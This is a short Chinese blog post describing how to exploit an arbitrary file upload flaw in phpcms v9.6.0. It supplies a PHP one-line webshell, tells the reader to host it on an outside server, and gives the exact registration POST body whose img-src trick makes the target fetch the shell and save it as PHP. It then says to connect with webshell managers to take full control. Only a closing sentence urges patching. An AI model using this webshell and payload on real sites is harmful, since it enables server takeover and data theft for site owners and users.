程序员人生 网站导航

phpcms v9.6.0任意文件上传漏洞

栏目:随笔时间:2021-09-16 09:37:19

经过亲自测试,本漏洞只针对phpcmx V9.6有效

首先我们在服务器上上传一个shell.txt一句话木门文件,内容为:

<?php @eval($_POST['wlsh']);?>

并且可以访问:http://www.baidu.com/shell.txt

然后在目标网站注册会员,打开burp,截断数据包,把post内容更改为

siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img src=http://www.baidu.com/shell.txt?.php#.jpg>&dosubmit=1&protocol=

利用repeater模块 查看回显包  得到shell地址。

phpcms v9.6.0任意文件上传漏洞

通过重新POST后,就可以看到自己上传的木马文件,

phpcms v9.6.0任意文件上传漏洞

然后用中国蚁剑或者菜刀连接后,就可以为所欲为了

这个漏洞危害很大,建议尽快修复!

------分隔线----------------------------
------分隔线----------------------------

最新技术推荐